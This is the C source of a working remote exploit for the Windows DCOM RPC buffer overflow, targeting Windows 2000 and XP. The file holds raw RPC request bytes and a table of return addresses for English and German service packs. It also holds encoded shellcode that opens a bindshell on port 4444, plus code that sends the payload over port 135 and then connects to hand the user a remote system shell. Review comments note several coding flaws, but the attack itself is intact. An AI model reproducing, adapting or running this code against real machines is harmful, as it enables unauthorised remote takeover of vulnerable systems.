
  1. /*
  2.   DCOM RPC Overflow Discovered by LSD
  3.    -> http://www.lsd-pl.net/files/get?WINDOWS/win32_dcom
  4.    
  5.   Based on FlashSky/Benjurry's Code
  6.    -> http://www.xfocus.org/documents/200307/2.html
  7.    
  8.   Written by H D Moore <hdm [at] metasploit.com>
  9.    -> http://www.metasploit.com/
  10.    
  11.   - Usage: ./dcom <Target ID> <Target IP>
  12.   - Targets:
  13.   -          0    Windows 2000 SP0 (english)
  14.   -          1    Windows 2000 SP1 (english)
  15.   -          2    Windows 2000 SP2 (english)
  16.   -          3    Windows 2000 SP3 (english)
  17.   -          4    Windows 2000 SP4 (english)
  18.   -          5    Windows XP SP0 (english)
  19.   -          6    Windows XP SP1 (english)
  20.   -          7    Windows 2000 SP3 (german)  // New Target
  21.   -          8    Windows 2000 SP4 (german)  // New Target
  22.   -          9    Windows 2000 SP4 (german) 2 // New Target
  23.   -         10    Windows XP SP1 (german)    // New Target
  24.  
  25. */
  26.  
  27. #include <stdio.h>
  28. #include <stdlib.h>
  29. #include <error.h>
  30. #include <sys/types.h>
  31. #include <sys/socket.h>
  32. #include <netinet/in.h>
  33. #include <arpa/inet.h>
  34. #include <unistd.h>
  35. #include <netdb.h>
  36. #include <fcntl.h>
  37. #include <unistd.h>
  38.  
/* Raw DCE/RPC PDU sent first by main() over TCP/135 (presumably the bind
   request, going by the name). Treated as an opaque blob: nothing in this
   file patches any field of it. */
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
  45.  
/* First fragment of the request body. main() copies it to the head of buf2
   and then adjusts several 4-byte fields in place (at buf2 offsets 0x8, 0x10,
   0x80, 0x84, 0xb4, 0xb8, 0xd0 and 0x18c) by adding sizeof(sc)-0xc, so the
   byte positions below are load-bearing -- do not reflow or edit by hand. */
unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00};
  102.  
/* Second fragment, appended after request1. main() adds sizeof(sc)/2 to the
   4-byte fields at offsets 0 and 8 before copying it, so this array is
   modified at run time (it is not const). */
unsigned char request2[]={
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x5C,0x00,0x5C,0x00};
  106.  
/* Third fragment, appended immediately after sc[]; not modified by main().
   The byte pairs look like a little-endian UTF-16 string ending in a NUL. */
unsigned char request3[]={
0x5C,0x00
,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
  113.  
  114.  
  115.  
/* Human-readable target names printed by the usage message in main().
   NULL-terminated; entry i must stay parallel to offsets[i] (11 entries).
   NOTE(review): string literals are assigned to unsigned char *, which is an
   incompatible-pointer-type diagnostic under strict compilers. */
unsigned char *targets [] =
        {
            "Windows 2000 SP0 (english)",
            "Windows 2000 SP1 (english)",
            "Windows 2000 SP2 (english)",
            "Windows 2000 SP3 (english)",
            "Windows 2000 SP4 (english)",
            "Windows XP SP0 (english)",
            "Windows XP SP1 (english)",
            "Windows 2000 SP3 (german)",
            "Windows 2000 SP4 (german)",
            "Windows 2000 SP4 (german)2",
            "Windows XP SP1 (german)",
            
             NULL                                                                                       
        };
  132.         
/* Per-target value that main() copies into sc[] at byte 36 (the "return
   address" slot). Parallel to targets[] (11 entries) but, unlike targets[],
   it has no terminating sentinel: main() indexes it with an unchecked
   atoi(argv[1]), so any id >= 11 (or a negative one, which becomes a huge
   unsigned index) reads past the end of the array. */
unsigned long offsets [] = 
        {
            0x77e81674, 
            0x77e829ec, 
            0x77e824b5, 
            0x77e8367a, 
            0x77f92a9b, 
            0x77e9afe3,
            0x77e626ba,
            0x77e32c29, // 7 2ksp3 ger
            0x77e04c29, // 8 2ksp4 ger
            0x77e2c256, // 9 2ksp4 ger 2
            0x77d418fc, //10 xpsp1 ger
          
        };
  148.  
/* Payload appended after request2 and before request3. Bytes 0..35 are the
   three string-literal rows below (12 + 16 + 8 bytes), so bytes 36..39 are
   the "return address" slot that main() overwrites with offsets[target_id].
   Because this is a string-literal initialiser, sizeof(sc) includes the
   trailing NUL; that size feeds every length fixup in main(). */
unsigned char sc[]=
    "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
    "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
    "\x46\x00\x58\x00\x46\x00\x58\x00"

    "\xff\xff\xff\xff" /* return address */
    
    "\xcc\xe0\xfd\x7f" /* primary thread data block */
    "\xcc\xe0\xfd\x7f" /* primary thread data block */

    /* port 4444 bindshell */
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
    "\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
    "\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
    "\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
    "\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
    "\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
    "\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
    "\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81"
    "\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
    "\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
    "\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
    "\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
    "\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
    "\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
    "\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
    "\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
    "\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
    "\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
    "\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
    "\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
    "\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
    "\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
    "\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
    "\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
    "\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
    "\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
    "\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
    "\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
    "\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
    "\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
    "\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
    "\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";
  203.  
  204.    
  205.  
/* Trailing fragment, appended after request3 to finish buf2; not modified
   by main(). */
unsigned char request4[]={
0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};
  212.  
  213.  
  214. /* ripped from TESO code */
/*
 * Interactive relay: copies stdin (fd 0) to `sock` and `sock` to stdout
 * (fd 1) until either side closes or a read fails. Never returns -- every
 * exit path calls exit(EXIT_FAILURE).
 *
 * NOTE(review): rfds is never initialised with FD_ZERO, neither before the
 * loop nor per iteration, so select() is handed an indeterminate fd_set and
 * bits set in earlier iterations are never cleared; select()'s return value
 * is ignored (an error or EINTR falls straight through to the FD_ISSET
 * checks); and both write() results are unchecked, so a short write silently
 * drops data. Kept as found.
 */
void shell (int sock)
{
        int     l;
        char    buf[512];
        fd_set  rfds;   /* never cleared -- see note above */


        while (1) {
                FD_SET (0, &rfds);
                FD_SET (sock, &rfds);

                select (sock + 1, &rfds, NULL, NULL, NULL);   /* return value unchecked */
                if (FD_ISSET (0, &rfds)) {
                        l = read (0, buf, sizeof (buf));
                        if (l <= 0) {
                                printf("\n - Connection closed by local user\n");
                                exit (EXIT_FAILURE);
                        }
                        write (sock, buf, l);   /* unchecked; may be short */
                }

                if (FD_ISSET (sock, &rfds)) {
                        l = read (sock, buf, sizeof (buf));
                        if (l == 0) {
                                printf ("\n - Connection closed by remote host.\n");
                                exit (EXIT_FAILURE);
                        } else if (l < 0) {
                                printf ("\n - Read failure\n");
                                exit (EXIT_FAILURE);
                        }
                        write (1, buf, l);   /* unchecked; may be short */
                }
        }
}
  249.  
  250.  
/*
 * Entry point. argv[1] is a target id (index into targets[]/offsets[]),
 * argv[2] a dotted-quad IPv4 address. Assembles request1|request2|sc|
 * request3|request4 into buf2, sends bindstr then buf2 to TCP/135, then
 * reconnects to TCP/4444 and hands that socket to shell().
 *
 * NOTE(review), in order of appearance:
 *  - memcpy() is called but <string.h> is not included (implicit declaration).
 *  - target_id is an unchecked atoi(argv[1]); offsets[] has 11 entries and
 *    no sentinel, so any other value is an out-of-bounds read (a negative
 *    argument becomes a huge unsigned index).
 *  - "%.8x" is passed an unsigned long (ret): format/argument mismatch.
 *  - The length fixups read and write unsigned char storage through
 *    unsigned long pointers: unaligned, aliasing-hostile, and written as if
 *    sizeof(unsigned long) were 4 (the patched fields are 4-byte values).
 *  - inet_addr() and recv() results are never checked; the recv() result is
 *    stored in len and then never used.
 *  - Every failure path returns 0 (success) from main, while the usage path
 *    exit(1)s; exit statuses are inconsistent.
 */
int main(int argc, char **argv)
{
    
    int sock;
    int len,len1;                   /* len: usage-loop index, later recv() result; len1: bytes assembled in buf2 */
    unsigned int target_id;
    unsigned long ret;              /* value taken from offsets[target_id] */
    struct sockaddr_in target_ip;   /* never zeroed: sin_zero stays indeterminate */
    unsigned short port = 135;
    unsigned char buf1[0x1000];     /* receive scratch for the bind reply */
    unsigned char buf2[0x1000];     /* assembled request; fixed-size fragments, no bounds check on the copies */

    printf("---------------------------------------------------------\n");
    printf("- Remote DCOM RPC Buffer Overflow Exploit\n");
    printf("- Original code by FlashSky and Benjurry\n");
    printf("- Rewritten by HDM <hdm [at] metasploit.com>\n");
    printf("\n- Addresses found & added for\n  German Win2000 SP3/SP4, WinXP SP1 - by b@digitalwaste.org\n");
    
    printf("- More Adds were found but i guess everyone figured out howto get them by now :)\n\n");
    printf("- Greets to t0lm, b0ld on #breakbeat on undernet!\n\n\n");
    


    /* Usage: walks the NULL-terminated targets[] table. */
    if(argc<3)
    {
        printf("- Usage: %s <Target ID> <Target IP>\n", argv[0]);
        printf("- Targets:\n");
        for (len=0; targets[len] != NULL; len++)
        {
            printf("-          %d\t%s\n", len, targets[len]);   
        }
        printf("\n");
        exit(1);
    }

    /* yeah, get over it :) */
    target_id = atoi(argv[1]);      /* unchecked -- see note above */
    ret = offsets[target_id];       /* out-of-bounds for target_id >= 11 */
    
    printf("- Using return address of 0x%.8x\n", ret);   /* %x given an unsigned long */

    /* Copies the first 4 bytes of ret into the "return address" slot of sc[];
       only the intended 32-bit value on a little-endian host. */
    memcpy(sc+36, (unsigned char *) &ret, 4);

    target_ip.sin_family = AF_INET;
    target_ip.sin_addr.s_addr = inet_addr(argv[2]);   /* INADDR_NONE not checked */
    target_ip.sin_port = htons(port);

    if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)
    {
        perror("- Socket");
        return(0);                  /* exit status 0 despite the failure */
    }
    
    if(connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip)) != 0)
    {
        perror("- Connect");
        return(0);                  /* exit status 0 despite the failure */
    }
    
    len=sizeof(sc);                 /* dead store: overwritten by recv() below before any read */
    memcpy(buf2,request1,sizeof(request1));
    len1=sizeof(request1);
    
    /* In-place fixups of two 4-byte fields in request2, done through
       unsigned long pointers (see note above about width and alignment). */
    *(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(sc)/2;  
    *(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(sc)/2;
    
    /* Append the remaining fragments in order; len1 tracks the total. */
    memcpy(buf2+len1,request2,sizeof(request2));
    len1=len1+sizeof(request2);
    memcpy(buf2+len1,sc,sizeof(sc));
    len1=len1+sizeof(sc);
    memcpy(buf2+len1,request3,sizeof(request3));
    len1=len1+sizeof(request3);
    memcpy(buf2+len1,request4,sizeof(request4));
    len1=len1+sizeof(request4);
    
    /* Same fixup pattern on eight 4-byte fields inside the request1 region
       of buf2; all offsets are hard-coded against the request1 layout. */
    *(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(sc)-0xc;
    

    *(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(sc)-0xc;  
    *(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(sc)-0xc;
    
    if (send(sock,bindstr,sizeof(bindstr),0)== -1)
    {
            perror("- Send");
            return(0);
    }
    len=recv(sock, buf1, 1000, 0);  /* reply discarded; -1 / 0 not handled */
    
    if (send(sock,buf2,len1,0)== -1)
    {
            perror("- Send");
            return(0);
    }
    close(sock);
    sleep(1);                       /* fixed delay before the second connection */
    
    /* Second connection: same address, TCP/4444 (matches the "port 4444"
       comment on sc[]); target_ip is reused rather than re-zeroed. */
    target_ip.sin_family = AF_INET;
    target_ip.sin_addr.s_addr = inet_addr(argv[2]);
    target_ip.sin_port = htons(4444);

    if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)
    {
        perror("- Socket");
        return(0);
    }
    
    if(connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip)) != 0)
    {
        printf("- Exploit appeared to have failed.\n");
        return(0);                  /* still exit status 0 */
    }   
    
    printf("- Dropping to System Shell...\n\n");

    shell(sock);                    /* never returns: shell() always exit()s */
    
    return(0);                      /* unreachable */
}
  374.  
  375.  
  376.